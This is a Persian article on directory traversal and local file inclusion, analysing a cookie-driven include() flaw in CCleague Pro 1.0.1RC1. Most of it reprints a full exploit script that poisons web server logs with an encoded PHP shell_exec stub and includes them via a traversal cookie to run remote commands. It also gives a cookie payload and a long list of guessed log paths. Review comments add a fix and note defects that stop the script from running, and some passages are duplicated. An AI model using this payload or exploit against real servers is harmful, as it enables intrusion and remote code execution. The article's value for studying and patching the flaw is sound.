سه شنبه 23 مرداد 1386, 1:41 قبلازظهر
توضیح: در این مقاله به بررسی آسیب‌پذیری پیمایش دایرکتوری (Directory Traversal / Local File Inclusion) می‌پردازیم و آن را در برنامه‌های وب نوشته‌شده با PHP، CGI، Java و HTML تحلیل می‌کنیم. مثال زیر یک نمونهٔ واقعی در PHP است که در آن مقدار یک کوکی، بدون اعتبارسنجی، در ساخت مسیر include() به کار می‌رود.
مثال:
آسیب‌پذیری در برنامه CCleaguePro_V1.0.1RC1 (فایل index.php).
کد آسیب‌پذیر:
مثال:
آسیب‌پذیری در برنامه CCleaguePro_V1.0.1RC1 (فایل index.php).
کد آسیب‌پذیر:
// Language selection from CCleague Pro 1.0.1RC1 (index.php). The cookie value is used
// exactly as received: there is no allowlist, no basename(), and no check that the
// resulting file actually lives under lang/.
if($_COOKIE["language"]) {
// Attacker-controlled: a value such as "../../../../etc/passwd%00" reaches include() below unchanged.
$llang = $_COOKIE["language"];
}
else
{
// $lang_array is defined elsewhere in the file (not shown here) — presumably a parsed
// Accept-Language list, so "en-US" becomes "en". NOTE(review): confirm its source.
$l_array = explode("-",$lang_array[0]);
$llang = $l_array[0];
// 14-day cookie (1209600 s); the secure flag is passed as "" and HttpOnly is not set at all.
setcookie("language",$llang,time()+1209600,"","","");
}
// LOCAL FILE INCLUSION: "../" sequences walk out of lang/, and on PHP < 5.3.4 a trailing
// null byte (sent as %00 and URL-decoded by PHP when $_COOKIE is populated) truncates the
// hard-coded ".php" suffix, so any file readable by the web server can be included. If the
// attacker can also get PHP code into such a file (e.g. a log), this becomes code execution.
// Fix: validate before use — e.g. `if (!preg_match('/^[a-z]{2}$/', $llang)) { $llang = 'en'; }`
// or `in_array($llang, $allowed_langs, true)` — and never build an include path from input.
include("lang/".$llang.".php");
طریقه استفاده از آسیب‌پذیری (مقدار کوکی language بدون هیچ اعتبارسنجی به include() می‌رسد؛ کافی است آن را در مرورگر تغییر دهیم):
نقل قول:
Ex:
Open the browser's cookie store, find the portal's cookies and change the `language` cookie as shown below (Opera makes this easy: Tools → Advanced → Cookies):
---------------cut here --------------->
language
en
to
language
../../../../../../../../../etc/passwd%00
Open the browser's cookie store, find the portal's cookies and change the `language` cookie as shown below (Opera makes this easy: Tools → Advanced → Cookies):
---------------cut here --------------->
language
en
to
language
../../../../../../../../../etc/passwd%00
و کد اکسپلویت منتشرشده (PoC) برای آشنایی بیشتر — توجه: این اسکریپت به همین شکل اجرا نمی‌شود (از جمله به دلیل آکولاد بستهٔ اضافی در انتهای آن و بررسی نادرست تعداد آرگومان‌ها) و تنها برای فهم روش حمله، یعنی تزریق کد PHP به فایل لاگ و سپس include کردن آن از طریق کوکی، آورده شده است:
#!/usr/bin/php -q -d short_open_tag=on
<?
/*
-----------------------------------------
[Unkn0wn Security Researcher]
CCleague Pro v1.0.1RC1 Remote Code Execution
C0de by Snake
Snake[dot]Apollyon[at]Gmail[dot]com
www.Unkn0wn.sub.ir
-----------------------------------------
Notice: works with register_globals=On and magic_quotes_gpc=Off (the %00 trick depends on the null byte reaching include() unescaped, and on a PHP version older than 5.3.4 that still truncates paths at a null byte).
Vulnerable code is in index.php (and some other pages), lines 27-35:
--------------------------------------
if($_COOKIE["language"]) {
$llang = $_COOKIE["language"];
}
else
{
$l_array = explode("-",$lang_array[0]);
$llang = $l_array[0];
setcookie("language",$llang,time()+1209600,"","","");
}
include("lang/".$llang.".php");
------------------------------------------
Ex:
Open the browser's cookie store, find the portal's cookies and change the `language` cookie as shown below (Opera makes this easy: Tools → Advanced → Cookies):
---------------cut here --------------->
language
en
to
language
../../../../../../../../../etc/passwd%00
---------------cut here ---------------<
*/
// --- Driver: banner and argument parsing ---
// NOTE(review): this script does not run as published. The usage text below lists four
// arguments (<Host> <Port> <Path> <Cmd>, i.e. argc == 5), but the check exits unless argc
// is exactly 4 — and with argc == 4, $argv[4] ($cmd) is never set. The usage example also
// omits the port, so its arguments would shift by one. The isset($port) fallback can never
// trigger, because $argv[2] always exists when the check passes. The file is opened with the
// short `<?` tag, hence -d short_open_tag=on in the shebang.
error_reporting(0);     // silences the undefined-index warnings the issues above would produce
set_time_limit(0);
echo " [CCleague Pro Sports CMS 1.0.1RC1 Remote Code Execution]\n".
" [Code By Snake <Snake[dot]Apollyon[at]Gmail[dot]com>]\n";
if ($argc!=4){
echo "Usage:
".$argv[0]." <Host> <Port> <Path> <Cmd>
<Host> Potal Host
<Port> other than 80 ,if you let this ,post is 80
<Path> Path to Portal
<Cmd> Shell command\n
Ex :
".$argv[0]." www.example.ir /CCleaguePro/ ls -al";
exit(0);
}
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$cmd=$argv[4];   // unset whenever the argc check above passes (see note)
if (!isset($port)){
$port = 80;
}
// Sends one raw HTTP request to $host and returns everything the server sent back.
// NOTE(review): three defects are visible in this function as written:
//  - $port is not declared global (only $data is), so fsockopen() is handed an undefined
//    port instead of the one parsed from argv;
//  - `$fp = fsockopen(...) || die(...)` parses as `$fp = (fsockopen(...) || die(...))`, so
//    $fp holds the boolean true, not the socket, and fputs()/feof()/fgets() receive a bool;
//  - $data is a global that is never reset, so every call appends to the output of all
//    previous calls rather than returning just this response.
// @param string $host   target host; the port is read from the (missing) global $port
// @param string $packet complete request, headers included, terminated by "\r\n\r\n"
// @return string the accumulated global $data
function baghali($host, $packet){
global $data;
$fp=fsockopen($host , $port, $errno, $errstr) || die("failed.\nReason: " . $errno . " - " . $errstr);
fputs($fp, $packet);
while(!feof($fp)) {
$data .=fgets($fp);
}
fclose($fp);
return $data;
}
// Printed before any connection has actually been attempted.
echo "[ * ] Connected to ".$host."\n\n";
print "[ * ] Injecting some code into log files ...\r\n";
// Stage 1 — log poisoning. $code decodes to a short PHP stub that runs the value of the
// request's CMD header through shell_exec() and echoes the output between the literal
// markers cmdxplstart / cmdxplend (the same markers split on further down). The stub is
// placed unencoded in both the request target and the User-Agent so that whichever of the
// web server's access/error logs records the request ends up containing PHP code.
$code = base64_decode( "PD9waHAgaWYoJF9TRVJWRVJbSFRUUF9DTURdKXsg ZWNobyBjbWR4cGxzdGFydC5zaGVsbF9leGVjKHN0 cmlwc2xhc2hlcygkX1NFUlZFUltIVFRQX0NNRF0p KS5jbWR4cGxlbmQ7IH0gPz4=");
$packet ="GET ".$path.$code." HTTP/1.1\r\n";
$packet .="User-Agent: ".$code."\r\n";
$packet .="Host: ".$host."\r\n";
$packet .="Connection: close\r\n\r\n";
baghali($host, $packet);
// Candidate log locations, expressed relative to lang/ (the number of "../" is guessed for
// several common Apache layouts; many entries are repeated at different depths).
$logs = array("../../../../../var/log/httpd/access_log" ,
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../apache2/logs/access_log",
"../../apache2/logs/error_log",
"../../../../../../../apache2/logs/access_log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log",
"../../../../../../../../../var/log/httpd/access_log",
"../../../../../../../../../var/log/httpd/error_log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../../../../../../apache/logs/error.log",
"../../../../../../apache/logs/access.log",
"../../../../../../apache2/logs/access_log",
"../../../../../../apache2/logs/error_log",
"../../../../../../../../../../../apache2/logs/access_log",
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../../logs/error.log",
"../../../../../../logs/access.log",
"../../../../../../../logs/error.log",
"../../../../../../../logs/access.log",
"../../../../../../../../logs/error.log",
"../../../../../../../../logs/access.log",
"../../../../../../../../../logs/error.log",
"../../../../../../../../../logs/access.log",
"../../../../../../../../../etc/httpd/logs/access_log",
"../../../../../../../../../etc/httpd/logs/access.log",
"../../../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../../../var/www/logs/access_log",
"../../../../../../../../../var/www/logs/access.log",
"../../../../../../../../../usr/local/apache/logs/access_log",
"../../../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../../../var/log/apache/access_log",
"../../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../var/log/access_log",
"../../../../../../../../../var/www/logs/error_log",
"../../../../../../../../../var/www/logs/error.log",
"../../../../../../../../../usr/local/apache/logs/error_log",
"../../../../../../../../../usr/local/apache/logs/error.log",
"../../../../../../../../../var/log/apache/error_log",
"../../../../../../../../../var/log/apache/error.log",
"../../../../../../../../../var/log/access_log",
"../../../../../../../../../var/log/error_log");
$i = 0;
// NOTE(review): $value is never used, and `$logs[$i++];` is evaluated only for its side
// effect, so $i has already advanced when $logs[$i] is read below. The first candidate is
// therefore skipped and the last iteration reads one past the end of the array (an undefined
// index, hidden by error_reporting(0)).
foreach($logs as $value){
$logs[$i++];
// Stage 2 — trigger the inclusion. The cookie carries the traversal path plus %00, which PHP
// URL-decodes into a null byte when it populates $_COOKIE; if the poisoned log is included,
// the stub reads its command from the custom CMD header (visible to PHP as $_SERVER['HTTP_CMD']).
// The plain Googlebot User-Agent presumably avoids writing a second copy of the stub to the log.
$packet ="GET ".$path."index.php HTTP/1.0\r\n";
$packet .="User-Agent: Googlebot/2.1\r\n";
$packet .="Host: ".$host."\r\n";
$packet .="Cookie: language=".$logs[$i]."%00;\r\n";
$packet .="CMD: $cmd\r\n";
$packet .="Connection: Close\r\n\r\n";
baghali($host, $packet);
echo("Trying $logs[$i]..\n");
// Extract whatever sits between the two markers. Because baghali() appends to the global
// $data without ever resetting it, this explode() runs over the accumulated responses of
// every attempt so far, not just the current one.
$adata = explode( "cmdxplstart",$data);
$bdata = explode( "cmdxplend",$adata[1]);
$cdata = $bdata[0];
// NOTE(review): eregi() was deprecated in PHP 5.3 and removed in PHP 7 (strpos() would do here);
// `$cdata==NULL` is a loose comparison and is also true for an empty string.
if(eregi("cmdxplend", $data)){
if($cdata==NULL){
die("\nExploit succeeded but blank command received..\n");
}
die("\nExploit Succeeded!\n\nCommand Resolution:\n$cdata\n");
}
}
// NOTE(review): the closing brace below has no matching opener — the function, the foreach
// and both ifs are already closed — so the file does not parse as published (likely a paste error).
}
die("Exploit failed..");
?>